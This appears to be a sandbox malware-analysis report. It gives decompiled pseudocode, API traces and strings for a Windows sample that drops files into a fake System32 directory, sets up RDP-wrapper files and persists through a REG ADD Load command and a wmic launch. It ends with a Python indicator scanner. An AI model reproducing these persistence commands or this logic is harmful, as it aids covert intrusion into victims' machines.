                                    • Part of subcall function 00412F55: lstrcatW.KERNEL32 ref: 00413029
                                    • Part of subcall function 00412F55: CreateDirectoryW.KERNEL32(\\?\C:\Windows \,00000000), ref: 00413039
                                    • Part of subcall function 00412F55: CreateDirectoryW.KERNEL32(\\?\C:\Windows \System32,00000000), ref: 00413041
                                    • Part of subcall function 00412F55: CopyFileW.KERNEL32(?,\\?\C:\Windows \System32\winSAT.exe,00000000), ref: 00413056
                                    • Part of subcall function 00412F55: CopyFileW.KERNEL32(?,\\?\C:\Windows \System32\winmmd.dll,00000000), ref: 00413065
                                    • Part of subcall function 00412F55: RegSetValueExW.ADVAPI32(00000000,Virtual Machine Platform,00000000,00000001,?,00001000), ref: 00413083
                                    • Part of subcall function 00412F55: RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00405909), ref: 0041308A
                                    • Part of subcall function 00412F55: GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00405909), ref: 00413094
                                    • Part of subcall function 004126DC: CopyFileW.KERNEL32(?,?,00000000), ref: 0041277D
                                    • Part of subcall function 0040373F: lstrcpyW.KERNEL32(00000000,74A313FB), ref: 00403769
                                    • Part of subcall function 004120F8: CreateProcessW.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 00412133
                                    • Part of subcall function 00405FEB: VirtualFree.KERNELBASE(?,00000000,00008000,00405D70,00000000,?,00412694,?,?,0041577A), ref: 00405FF3
                                  Strings
                                  • MaxConnectionsPer1_0Server, xrefs: 004155FB
                                  • \Microsoft Vision\, xrefs: 00415681
                                  • MaxConnectionsPerServer, xrefs: 00415610
                                  • Software\Microsoft\Windows\CurrentVersion\Internet Settings, xrefs: 004155DB
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: File$Create$Directory$Close$CopyProcessValuelstrcat$HandleHeapModuleNameSystemWow64$AllocateCountCurrentDisableErrorEventFolderFreeLastPathReadRedirectionSizeTickVirtuallstrcpy
                                  • String ID: MaxConnectionsPer1_0Server$MaxConnectionsPerServer$Software\Microsoft\Windows\CurrentVersion\Internet Settings$\Microsoft Vision\
                                  • API String ID: 651455083-2552559493
                                  • Opcode ID: 4a5fae1ebe26e36fe060b07020dc0cbf3753f0c38d14f470fd35631cd4a0eb1f
                                  • Instruction ID: 7326d773f6840a3835b81c51b4f2bde8360c666f101d5547bb5d37e447b5e8b5
                                  • Opcode Fuzzy Hash: 4a5fae1ebe26e36fe060b07020dc0cbf3753f0c38d14f470fd35631cd4a0eb1f
                                  • Instruction Fuzzy Hash: 81614171408344EBD720EF61CC85EEF77B8EF94708F40492FB685921A1DB389985CB6A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 96%
                                  			E004126DC(intOrPtr* __ecx, void* __eflags, WCHAR* _a4, char* _a8, void* _a12) {
                                  				void* _v12;
                                  				WCHAR* _v16;
                                  				WCHAR* _v20;
                                  				intOrPtr* _v24;
                                  				WCHAR* _v28;
                                  				char _v32;
                                  				char _v36;
                                  				char _v40;
                                  				char _v44;
                                  				void* _t90;
                                  				void* _t94;
                                  				intOrPtr* _t108;
                                  				intOrPtr* _t112;
                                  				intOrPtr* _t130;
                                  				intOrPtr* _t132;
                                  				intOrPtr* _t145;
                                  				intOrPtr* _t147;
                                  				int _t152;
                                  				void* _t161;
                                  				void* _t167;
                                  				int _t170;
                                  				int _t179;
                                  				char* _t185;
                                  				WCHAR* _t192;
                                  				intOrPtr _t228;
                                  				intOrPtr* _t254;
                                  				CHAR* _t255;
                                  				void* _t261;
                                  				WCHAR* _t263;
                                  				WCHAR** _t264;
                                  				char** _t265;
                                  				void* _t268;
                                  
                                  				_t268 = __eflags;
                                  				_t254 = __ecx;
                                  				_v24 = __ecx;
                                  				E004109A0(); // executed
                                  				_t250 = 0xa;
                                  				_t185 =  &_v44;
                                  				E004035B9(_t185, _t250, _t268); // executed
                                  				_push(_t185);
                                  				_push(_t185);
                                  				_t90 = E00412514(__ecx, _t185, __ecx + 0x10); // executed
                                  				E00412554(__ecx);
                                  				_t179 = 0;
                                  				if(_t90 == 0) {
                                  					L4:
                                  					_t259 = _t254 + 0x10;
                                  					goto L5;
                                  				} else {
                                  					_t270 = _a4;
                                  					if(_a4 == 0) {
                                  						goto L4;
                                  					} else {
                                  						_t250 =  *((intOrPtr*)(__ecx + 0xc));
                                  						_t264 = __ecx + 0x20;
                                  						_t161 = E00410C8A( &_v28,  *((intOrPtr*)(__ecx + 0xc)), _t270); // executed
                                  						E00403549(_t264, _t161); // executed
                                  						E00410C3E(E00405FEB(_v28), _t264);
                                  						E0040373F( &_v16, _t254 + 0x4c); // executed
                                  						_t167 = E0040357C(_t264, _t250, _t270, "\\"); // executed
                                  						E00403447(_t167, _t270,  &_v16); // executed
                                  						_t243 = _v16;
                                  						E00405FEB(_v16);
                                  						_t170 = CopyFileW(_v20,  *_t264, 0); // executed
                                  						if(_t170 != 0) {
                                  							E00403333(_t264, _t250, _t265);
                                  							E00405A61(_t254 + 0x30, _t250, _t265);
                                  							E004061F0( &_v40, _t250, _t264, _t264, _t243, _t243);
                                  							_t265 =  &(_t265[4]);
                                  							_t259 = _t254 + 0x10;
                                  							E00412612(_t254, 0x80000001, _t254 + 0x10, 0xf003f, 0); // executed
                                  							E004125DF(_t254, _t254 + 0x18,  &_v40, 3); // executed
                                  							E00403148( &_v40);
                                  							L5:
                                  							if( *_t254 == _t179) {
                                  								E00412612(_t254, 0x80000001, _t259, 0xf003f, _t179);
                                  							}
                                  							_t273 = _a12 - _t179;
                                  							if(_a12 == _t179) {
                                  								L11:
                                  								__eflags = _a8;
                                  								if(__eflags != 0) {
                                  									__eflags = _a4;
                                  									_t260 = _t254 + 0x20;
                                  									_a12 = _t254 + 0x20;
                                  									if(_a4 == 0) {
                                  										E00403549(_t260,  &_v20);
                                  									}
                                  									E00403666(_t260,  &_a4); // executed
                                  									E00405FEB(_a4);
                                  									_t255 = E00401085(0x200);
                                  									E0040102C(_t255, "cmd.exe /c REG ADD \"HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows\" /f /v Load /t REG_SZ /d \"", 0x68);
                                  									_t108 = E00403666(_t260,  &_a4); // executed
                                  									_t261 = E00401133( *_t108);
                                  									E00405FEB(_a4);
                                  									_t112 = E00403666(_a12,  &_a4); // executed
                                  									_t74 =  &(_t255[0x68]); // 0x68
                                  									E0040102C(_t74,  *_t112, _t261);
                                  									E00405FEB(_a4);
                                  									_t76 =  &(_t255[0x68]); // 0x68
                                  									__eflags =  &(_t76[_t261]);
                                  									E0040102C( &(_t76[_t261]), "\"", 2);
                                  									WinExec(_t255, _t179); // executed
                                  								}
                                  								E004036F7( &_a4,  *((intOrPtr*)(_v24 + 0x20))); // executed
                                  								_t94 = E004036F7( &_a12, L":Zone.Identifier"); // executed
                                  								E00403447( &_a4, __eflags, _t94); // executed
                                  								E00405FEB(_a12);
                                  								DeleteFileW(_a4); // executed
                                  								_t192 = _a4;
                                  								_t179 = 1;
                                  								__eflags = 1;
                                  							} else {
                                  								__imp__SHGetKnownFolderPath(_t179, _t179,  &_v32);
                                  								E004036F7( &_v16, _v32);
                                  								E0040357C( &_v16, _t250, _t273, L"\\programs.bat");
                                  								E004036F7( &_v12, L"for /F \"usebackq tokens=*\" %%A in (\"");
                                  								E0040357C(E0040357C(E0040357C( &_v12, _t250, _t273, _v16), _t250, _t273, L":start"), _t250, _t273, L"\") do %%A");
                                  								_t130 = E00403666( &_v12,  &_v36);
                                  								_t132 = E00403666( &_v16,  &_v28);
                                  								E004133B6( *_t132,  *_t130, E00403373( &_v12));
                                  								E00405FEB(_v28);
                                  								E00405FEB(_v36);
                                  								E00410C8A( &_v28,  *((intOrPtr*)(_v24 + 0xc)), _t273);
                                  								 *_t265 = L":ApplicationData";
                                  								E0040357C( &_v28,  *((intOrPtr*)(_v24 + 0xc)), _t273,  &E00417570);
                                  								E004036F7( &_a12, L"wmic process call create \'\"");
                                  								_t263 = _v28;
                                  								E0040357C(E0040357C( &_a12,  *((intOrPtr*)(_v24 + 0xc)), _t273, _t263),  *((intOrPtr*)(_v24 + 0xc)), _t273, L"\"\'");
                                  								E0040357C( &_v16,  *((intOrPtr*)(_v24 + 0xc)), _t273, L":start");
                                  								_t145 = E00403666( &_a12,  &_v28);
                                  								_t147 = E00403666( &_v16,  &_v36);
                                  								E004133B6( *_t147,  *_t145, E00403373( &_a12));
                                  								E00405FEB(_v36);
                                  								E00405FEB(_v28);
                                  								_t179 = 0;
                                  								_t152 = CopyFileW(_v20, _t263, 0);
                                  								_t228 = _a12;
                                  								if(_t152 != 0) {
                                  									E00405FEB(_t228);
                                  									_a12 = 0;
                                  									E00405FEB(_t263);
                                  									E00405FEB(_v12);
                                  									_v12 = 0;
                                  									E00405FEB(_v16);
                                  									_t254 = _v24;
                                  									goto L11;
                                  								} else {
                                  									E00405FEB(_t228);
                                  									_a12 = 0;
                                  									E00405FEB(_t263);
                                  									E00405FEB(_v12);
                                  									_t192 = _v16;
                                  									_v12 = 0;
                                  								}
                                  							}
                                  							E00405FEB(_t192);
                                  						}
                                  					}
                                  				}
                                  				E00405FEB(_v44);
                                  				E00405FEB(_v20);
                                  				return _t179;
                                   			}

                                  APIs
                                    • Part of subcall function 004109A0: GetModuleFileNameW.KERNEL32(00000000,00000000,000007D0,?,00000000,?VA,?,00412BF1,80000001,?,000F003F,00000000,00000000,Software\Microsoft\Windows NT\CurrentVersion\Windows,00000000,InitWindows), ref: 004109C1
                                    • Part of subcall function 00412514: RegCreateKeyExW.KERNEL32(80000001,00000000,00000000,00000000,00000001,00000001,00000000,?,00000000,74A313FB,?,?,0041270B,?,?), ref: 00412534
                                    • Part of subcall function 00412554: RegCloseKey.KERNEL32(?,?,004126D3,?,?,0041577A), ref: 0041255E
                                  • CopyFileW.KERNEL32(?,?,00000000), ref: 0041277D
                                    • Part of subcall function 00412612: RegCreateKeyExW.ADVAPI32(74A313FB,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,?VA,?,00412B64,80000001,?), ref: 00412646
                                    • Part of subcall function 00412612: RegOpenKeyExW.KERNEL32(74A313FB,00000000,00000000,?,?,?,?,?VA,?,00412B64,80000001,?,000F003F,00000000,00000000,Software\Microsoft\Windows NT\CurrentVersion\Windows), ref: 00412661
                                    • Part of subcall function 004125DF: RegSetValueExW.KERNEL32(?,000F003F,00000000,80000001,?,?,?,?,004127D2,?,?,00000003,80000001,?,000F003F,00000000), ref: 004125FE
                                  • SHGetKnownFolderPath.SHELL32(00417570,00000000,00000000,?), ref: 0041280A
                                  • CopyFileW.KERNEL32(?,?,00000000), ref: 00412928
                                    • Part of subcall function 00410C8A: SHGetSpecialFolderPathW.SHELL32(00000000,?,?,00000000), ref: 00410CBB
                                    • Part of subcall function 00403549: lstrcpyW.KERNEL32(00000000,00000000), ref: 0040356E
                                    • Part of subcall function 00405FEB: VirtualFree.KERNELBASE(?,00000000,00008000,00405D70,00000000,?,00412694,?,?,0041577A), ref: 00405FF3
                                    • Part of subcall function 00410C3E: SHCreateDirectoryExW.SHELL32(00000000,?,00000000), ref: 00410C44
                                    • Part of subcall function 0040373F: lstrcpyW.KERNEL32(00000000,74A313FB), ref: 00403769
                                    • Part of subcall function 00403447: lstrcatW.KERNEL32 ref: 00403477
                                  • WinExec.KERNEL32 ref: 00412A20
                                  • DeleteFileW.KERNEL32(?,00000000,:Zone.Identifier,?,?,?,?,?,00000000,74A313FB,00000000), ref: 00412A55
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: File$Create$CopyFolderPathlstrcpy$CloseDeleteDirectoryExecFreeKnownModuleNameOpenSpecialValueVirtuallstrcat
                                  • String ID: ") do %%A$:ApplicationData$:Zone.Identifier$:start$\programs.bat$cmd.exe /c REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows" /f /v Load /t REG_SZ /d "$for /F "usebackq tokens=*" %%A in ("$wmic process call create '"
                                  • API String ID: 1503101065-3574166584
                                  • Opcode ID: 6225df1192c8e899447a60778a8c710b64a72e34b1e6dc93e682aafba756cd9f
                                  • Instruction ID: 79257a46d42963d1d04969a5855fdaa00e68833498fbabbc424ca4f910327048
                                  • Opcode Fuzzy Hash: 6225df1192c8e899447a60778a8c710b64a72e34b1e6dc93e682aafba756cd9f
                                  • Instruction Fuzzy Hash: 1FA12F71A0050AABCB14EF61CC92DEE7B79EF44348B00442EF502772D2DF78AA55CB99
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 79%
                                  			E0040E5A3(void* __ecx, void* __edx) {
                                  				char _v8;
                                  				char _v12;
                                  				intOrPtr* _t11;
                                  				void* _t14;
                                  				void* _t15;
                                  				void* _t19;
                                  				void* _t20;
                                  				void* _t25;
                                  				void* _t33;
                                  				void* _t42;
                                  				intOrPtr _t43;
                                  				void* _t67;
                                  				intOrPtr _t71;
                                  				void* _t80;
                                  
                                  				_t67 = __edx;
                                  				_push(__ecx);
                                  				_push(__ecx);
                                  				InitializeCriticalSection(0x55ad18);
                                  				_t71 = 5;
                                  				asm("xorps xmm0, xmm0");
                                  				 *0x55ad68 = _t71;
                                  				 *0x55ad60 = _t71;
                                  				_t42 = 0x18;
                                  				asm("movups [0x55ad30], xmm0");
                                  				 *0x55ad40 = 0;
                                  				asm("movups [0x55ad48], xmm0");
                                  				 *0x55ad58 = 0;
                                  				 *0x55ad64 = 0;
                                  				_t11 = E00406099(_t42);
                                  				_t82 = _t11;
                                  				if(_t11 == 0) {
                                  					_t43 = 0;
                                  				} else {
                                  					 *_t11 = _t71;
                                  					_t1 = _t11 + 4; // 0x4
                                  					_t43 = _t1;
                                  					asm("stosd");
                                  					asm("stosd");
                                  					asm("stosd");
                                  					asm("stosd");
                                  					asm("stosd");
                                  				}
                                  				 *0x55ad5c = _t43;
                                  				 *0x55ad74 = 0;
                                  				 *0x55ad78 = 0; // executed
                                  				E00403411(0x55ad40, _t67, L"TermService"); // executed
                                  				E00403411(0x55ad4c, _t67, L"%ProgramFiles%"); // executed
                                  				_t14 = E004036F7( &_v12, L"%windir%\\System32"); // executed
                                  				_t68 = _t14;
                                  				_t15 = E004032E6( &_v8, _t14, _t82); // executed
                                  				E00403549(0x55ad58, _t15); // executed
                                  				E00405FEB(_v8);
                                  				_v8 = 0;
                                  				E00405FEB(_v12);
                                  				_t19 = E00411177(_v12);
                                  				_t83 = _t19 - 1;
                                  				if(_t19 != 1) {
                                  					_t69 = 0x55ad4c;
                                  					_t20 = E004032E6( &_v12, 0x55ad4c, __eflags);
                                  					_t80 = 0x55ad50;
                                  					E00403549(0x55ad50, _t20);
                                  					E00405FEB(_v12);
                                  				} else {
                                  					E00403411(0x55ad4c, _t68, L"%ProgramW6432%"); // executed
                                  					_t69 = 0x55ad4c;
                                  					_t33 = E004032E6( &_v12, 0x55ad4c, _t83); // executed
                                  					_t80 = 0x55ad50;
                                  					E00403549(0x55ad50, _t33); // executed
                                  					E00405FEB(_v12);
                                  					E00403411(0x55ad4c, 0x55ad4c, L"%ProgramFiles%"); // executed
                                  				}
                                  				E0040357C(_t80, _t69, _t83, L"\\Microsoft DN1"); // executed
                                  				E0040357C(0x55ad4c, _t69, _t83, L"\\Microsoft DN1"); // executed
                                  				_t25 = E0040357C(0x55ad58, _t69, _t83, L"\\rfxvmt.dll"); // executed
                                  				E00410C3E(_t25, _t80);
                                  				E00403549(0x55ad54, _t80); // executed
                                  				E0040357C(0x55ad54, _t69, _t83, L"\\rdpwrap.ini"); // executed
                                  				E0040357C(_t80, _t69, _t83, L"\\sqlmap.dll"); // executed
                                  				E0040357C(0x55ad4c, _t69, _t83, L"\\sqlmap.dll"); // executed
                                  				return 0x55ad18;
                                   			}

                                  APIs
                                  • InitializeCriticalSection.KERNEL32(0055AD18), ref: 0040E5B0
                                    • Part of subcall function 00406099: GetProcessHeap.KERNEL32(00000000,000000F4,00411996,?,74A313FB,00000000,00405B72), ref: 0040609C
                                    • Part of subcall function 00406099: HeapAlloc.KERNEL32(00000000), ref: 004060A3
                                    • Part of subcall function 004032E6: ExpandEnvironmentStringsW.KERNEL32(?,?,000001FF), ref: 00403319
                                    • Part of subcall function 00403549: lstrcpyW.KERNEL32(00000000,00000000), ref: 0040356E
                                    • Part of subcall function 00405FEB: VirtualFree.KERNELBASE(?,00000000,00008000,00405D70,00000000,?,00412694,?,?,0041577A), ref: 00405FF3
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Similarity
                                  • API ID: Heap$AllocCriticalEnvironmentExpandFreeInitializeProcessSectionStringsVirtuallstrcpy
                                  • String ID: %ProgramFiles%$%ProgramW6432%$%windir%\System32$TermService$\Microsoft DN1$\rdpwrap.ini$\rfxvmt.dll$\sqlmap.dll
                                  • API String ID: 2811233055-3289620323
                                  • Opcode ID: 39239106dbb69af809a275f728310b66d98112eac81cc19e74a28374785dc611
                                  • Instruction ID: 6cb6bcb1a7122bfa5540acbacd22e5e8e3ff012f813de54f9fa316898c3517f8
                                  • Opcode Fuzzy Hash: 39239106dbb69af809a275f728310b66d98112eac81cc19e74a28374785dc611
                                  • Instruction Fuzzy Hash: 7F319130B0061467C718BF669C628AE2E79ABD8707710063FB5027B2E2DE7C8E45975E
                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			_entry_() {
                                  				struct _STARTUPINFOA _v72;
                                  				intOrPtr _t6;
                                  				int _t11;
                                  				intOrPtr _t15;
                                  				intOrPtr* _t16;
                                  				intOrPtr* _t18;
                                  				intOrPtr _t20;
                                  
                                  				_t16 = GetCommandLineA();
                                  				_t6 =  *_t16;
                                  				if(_t6 != 0x22) {
                                  					while(1) {
                                  						__eflags = _t6 - 0x20;
                                  						if(_t6 <= 0x20) {
                                  							break;
                                  						}
                                  						_t16 = _t16 + 1;
                                  						__eflags = _t16;
                                  						_t6 =  *_t16;
                                  					}
                                  					L12:
                                  					if(_t6 != 0) {
                                  						__eflags = _t6 - 0x20;
                                  						if(_t6 > 0x20) {
                                  							goto L13;
                                  						}
                                  						_t16 = _t16 + 1;
                                  						__eflags = _t16;
                                  						L11:
                                  						_t6 =  *_t16;
                                  						goto L12;
                                  					}
                                  					L13:
                                  					_t2 =  &(_v72.dwFlags);
                                  					_v72.dwFlags = _v72.dwFlags & 0x00000000;
                                  					GetStartupInfoA( &_v72);
                                  					E00405EB6();
                                  					E00405EE3(0x41c000, 0x41c030);
                                  					GetModuleHandleA(0);
                                  					_t11 = E004154EB( *_t2, 0x41c000, 0x41c000); // executed
                                  					E00405ECB();
                                  					ExitProcess(_t11);
                                  				}
                                  				_t18 = _t16 + 1;
                                  				_t20 =  *_t18;
                                  				if(_t20 == 0) {
                                  					L5:
                                  					_t1 = _t18 + 1; // 0x3
                                  					_t14 =  !=  ? _t18 : _t1;
                                  					_t16 =  !=  ? _t18 : _t1;
                                  					goto L11;
                                  				}
                                  				_t15 = _t20;
                                  				while(1) {
                                  					_t20 = _t15;
                                  					if(_t15 == 0x22) {
                                  						goto L5;
                                  					}
                                  					_t18 = _t18 + 1;
                                  					_t20 =  *_t18;
                                  					_t15 = _t20;
                                  					if(_t20 != 0) {
                                  						continue;
                                  					}
                                  					goto L5;
                                  				}
                                  				goto L5;
                                  			}

                                  Instruction addresses: 0x00405e35 to 0x00405eaf

                                  APIs
                                  • GetCommandLineA.KERNEL32 ref: 00405E2F
                                  • GetStartupInfoA.KERNEL32 ref: 00405E7E
                                  • GetModuleHandleA.KERNEL32(00000000), ref: 00405E9A
                                  • ExitProcess.KERNEL32 ref: 00405EAF
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Similarity
                                  • API ID: CommandExitHandleInfoLineModuleProcessStartup
                                  • String ID:
                                  • API String ID: 2164999147-0
                                  • Opcode ID: 03e413eae8a4ea63490194bdb283974b75a2e54e2929799594d1208bb41f8623
                                  • Instruction ID: 79012c7e925f986a536a85d8df8cd7193993c2d42f70a77d9956ba037c84b5bc
                                  • Opcode Fuzzy Hash: 03e413eae8a4ea63490194bdb283974b75a2e54e2929799594d1208bb41f8623
                                  • Instruction Fuzzy Hash: DE010434108A444ED7206B74D8863EB3FA6DB1A348B68107EE1C5A7382C63E0E478EDD
                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 91%
                                  			E004134A2(CHAR* __ecx, signed int* __edx) {
                                  				long _v8;
                                  				void* _t5;
                                  				long _t6;
                                  				signed int _t7;
                                  				void* _t11;
                                  				signed int* _t18;
                                  				void* _t22;
                                  
                                  				_push(__ecx);
                                  				_t18 = __edx;
                                  				_t11 = E00401085(0x400000);
                                  				_v8 = 0;
                                  				_t5 = CreateFileA(__ecx, 0x80000000, 0, 0, 3, 0x80, 0); // executed
                                  				_t22 = _t5;
                                  				if(_t22 == 0xffffffff) {
                                  					 *_t18 =  *_t18 & 0x00000000;
                                  				}
                                  				_t6 = GetFileSize(_t22, 0);
                                  				 *_t18 = _t6;
                                  				_t7 = ReadFile(_t22, _t11, _t6,  &_v8, 0); // executed
                                  				if(_t7 == 0) {
                                  					 *_t18 =  *_t18 & _t7;
                                  				}
                                  				CloseHandle(_t22); // executed
                                  				return _t11;
                                  			}

                                  Instruction addresses: 0x004134a5 to 0x0041350c

                                  APIs
                                    • Part of subcall function 00401085: GetProcessHeap.KERNEL32(00000000,?,004134B7,00400000,?,?,00000000,?,?,00415553), ref: 0040108B
                                    • Part of subcall function 00401085: RtlAllocateHeap.NTDLL(00000000,?,?,00000000,?,?,00415553), ref: 00401092
                                  • CreateFileA.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000), ref: 004134CF
                                  • GetFileSize.KERNEL32(00000000,00000000,?,?,00000000,?,?,00415553), ref: 004134E2
                                  • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 004134F3
                                  • CloseHandle.KERNEL32(00000000), ref: 00413500
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Similarity
                                  • API ID: File$Heap$AllocateCloseCreateHandleProcessReadSize
                                  • String ID:
                                  • API String ID: 2517252058-0
                                  • Opcode ID: acc67c7317e70eea7451c17902bc0e4f69181cd995ee4df2eb362c61f509b136
                                  • Instruction ID: aa115e6f790b4d38b1fbeae35b29bc5e12f96e584a277f2799dc653a56db372b
                                  • Opcode Fuzzy Hash: acc67c7317e70eea7451c17902bc0e4f69181cd995ee4df2eb362c61f509b136
                                  • Instruction Fuzzy Hash: E1F0AFB2605210BFE3215B35AC09FFB76ACDB54725F204135FA41E62C0EBB45E0086A8
                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E0041111B() {
                                  				void* _v8;
                                  				long _v12;
                                  				void _v16;
                                  				long _t21;
                                  				void* _t22;
                                  
                                  				_t22 = 0;
                                  				_v8 = 0;
                                  				if(OpenProcessToken(GetCurrentProcess(), 8,  &_v8) != 0) {
                                  					_t21 = 4;
                                  					_v12 = _t21;
                                  					GetTokenInformation(_v8, 0x14,  &_v16, _t21,  &_v12); // executed
                                  					_t22 =  !=  ? _v16 : 0;
                                  				}
                                  				if(_v8 != 0) {
                                  					CloseHandle(_v8); // executed
                                  				}
                                  				return 0 | _t22 != 0x00000000;
                                  			}

                                  Instruction addresses: 0x00411125 to 0x00411176

                                  APIs
                                  • GetCurrentProcess.KERNEL32(00000008,00000000,74A313FB,00000000,74A313FB,00000000,?,?,?,?,0041563F,?), ref: 0041112D
                                  • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,0041563F,?), ref: 00411134
                                  • GetTokenInformation.KERNELBASE(?,00000014(TokenIntegrityLevel),?,00000004,?,?,?,?,?,0041563F,?), ref: 00411152
                                  • CloseHandle.KERNEL32(00000000), ref: 00411167
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Similarity
                                  • API ID: ProcessToken$CloseCurrentHandleInformationOpen
                                  • String ID:
                                  • API String ID: 215268677-0
                                  • Opcode ID: e114797ed7bb71c60c3d08b110eba96b8ccbcffbddbf2284c9e0a1db07d94dea
                                  • Instruction ID: 0771c0d2f46ea20c01bd2ae64a6620b8b7ded6cbafb58bfe859f8e00c08c725d
                                  • Opcode Fuzzy Hash: e114797ed7bb71c60c3d08b110eba96b8ccbcffbddbf2284c9e0a1db07d94dea
                                  • Instruction Fuzzy Hash: 87F0F971E00218FBDB119BA0DD09BDEBBB8EF08751F118065EA01E61A0D7709F84DAA4
                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00412612(void** __ecx, void* _a4, short** _a8, int _a12, int _a16) {
                                  				long _t10;
                                  				short** _t22;
                                  				void** _t23;
                                  
                                  				_t23 = __ecx;
                                  				_t22 = _a8;
                                  				if(_a16 == 0 || E00410C50(_a4, _t22) != 0) {
                                  					L4:
                                  					_t10 = RegOpenKeyExW(_a4,  *_t22, 0, _a12, _t23); // executed
                                  					if(_t10 != 0) {
                                  						goto L6;
                                  					}
                                  					return _t10 + 1;
                                  				} else {
                                  					_a16 = 0;
                                  					if(RegCreateKeyExW(_a4,  *_t22, 0, 0, 0, _a12, 0, __ecx,  &_a16) != 0) {
                                  						L6:
                                  						return 0;
                                  					}
                                  					E00412554(_t23);
                                  					goto L4;
                                  				}
                                  			}

                                  Instruction addresses: 0x00412619 to 0x0041266e

                                  APIs
                                  • RegOpenKeyExW.KERNEL32(74A313FB,00000000,00000000,?,?,?,?,?VA,?,00412B64,80000001,?,000F003F,00000000,00000000,Software\Microsoft\Windows NT\CurrentVersion\Windows), ref: 00412661
                                    • Part of subcall function 00410C50: RegOpenKeyExW.ADVAPI32(74A313FB,00000000,00000000,00020019,00000000,74A313FB,?,0041262E,?,?,?VA,?,00412B64,80000001,?,000F003F), ref: 00410C66
                                  • RegCreateKeyExW.ADVAPI32(74A313FB,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,?VA,?,00412B64,80000001,?), ref: 00412646
                                    • Part of subcall function 00412554: RegCloseKey.KERNEL32(?,?,004126D3,?,?,0041577A), ref: 0041255E
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Similarity
                                  • API ID: Open$CloseCreate
                                  • String ID: ?VA
                                  • API String ID: 1752019758-1028452459
                                  • Opcode ID: 29839ccb8850909feca5f7e178c66ded91a73c690c585cbb959138e2f25b0d0e
                                  • Instruction ID: 4932445430126be2ff0c3f65702f86cceb6eb04fd32848aa65fa8fc0dd82d40c
                                  • Opcode Fuzzy Hash: 29839ccb8850909feca5f7e178c66ded91a73c690c585cbb959138e2f25b0d0e
                                  • Instruction Fuzzy Hash: 5A01197120020EBFAB119F62DE84DFB7B6EEF44398B10402AF905D1250E7B5CDA19AB5
                                  Uniqueness Score: -1.00%
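Added triage example, not part of the sandbox report and not the malware's own code. It collects the two indicator sets that the decompiled functions above expose: the RDP-wrapper file names and environment variables listed as String IDs for the function at 0x0040E5A3 (rdpwrap.ini, rfxvmt.dll, sqlmap.dll, Microsoft DN1, TermService), and the HKCU key Software\Microsoft\Windows NT\CurrentVersion\Windows that E00412612 opens with KEY_ALL_ACCESS (0x000F003F) and creates if it is missing. The scanner tries both ASCII and UTF-16LE, because the function uses the W variants (ExpandEnvironmentStringsW, lstrcpyW), so the strings sit wide in a process dump. How the path fragments are joined on disk, and the use of System32 for the two DLLs, are assumptions of this example, not something the report states; the sample dump is constructed.

```python
"""Indicator triage for the strings and registry path exposed by the functions above.

Added example; not part of the sandbox report and not the malware's own code.
The indicator strings are the String IDs of the function at 0x0040E5A3; the
registry path and access mask are the RegOpenKeyExW / RegCreateKeyExW arguments
at 0x00412661 and 0x00412646. How the path fragments are joined on disk is an
assumption made here, not something the report states.
"""
import os
import re
import sys

# String IDs listed for the function at 0x0040E5A3.
RDP_WRAPPER_STRINGS = [
    "%ProgramFiles%", "%ProgramW6432%", r"%windir%\System32", "TermService",
    r"\Microsoft DN1", r"\rdpwrap.ini", r"\rfxvmt.dll", r"\sqlmap.dll",
]
# Key passed to RegOpenKeyExW / RegCreateKeyExW; the call site shows root
# 80000001 (HKEY_CURRENT_USER) and samDesired 000F003F (KEY_ALL_ACCESS).
PERSISTENCE_KEY = r"Software\Microsoft\Windows NT\CurrentVersion\Windows"
DROP_FILES = ("rdpwrap.ini", "rfxvmt.dll", "sqlmap.dll")


def scan_dump(data):
    """Return {indicator: [(offset, encoding), ...]} for each indicator present.

    Both encodings are tried: the function calls ExpandEnvironmentStringsW and
    lstrcpyW, so in a memory dump the strings are normally UTF-16LE, while a
    packed or partially decoded payload may still hold them as ASCII.
    """
    hits = {}
    for s in RDP_WRAPPER_STRINGS + [PERSISTENCE_KEY]:
        for enc, pat in (("ascii", s.encode("ascii")), ("utf-16le", s.encode("utf-16-le"))):
            for m in re.finditer(re.escape(pat), data):
                hits.setdefault(s, []).append((m.start(), enc))
    return hits


def rdp_wrapper_verdict(hits):
    """True when the drop directory and at least one wrapper file name co-occur;
    that pairing is what the 0x0040E5A3 function expands into paths, and it is
    not something a benign process image carries."""
    return r"\Microsoft DN1" in hits and any("\\" + f in hits for f in DROP_FILES)


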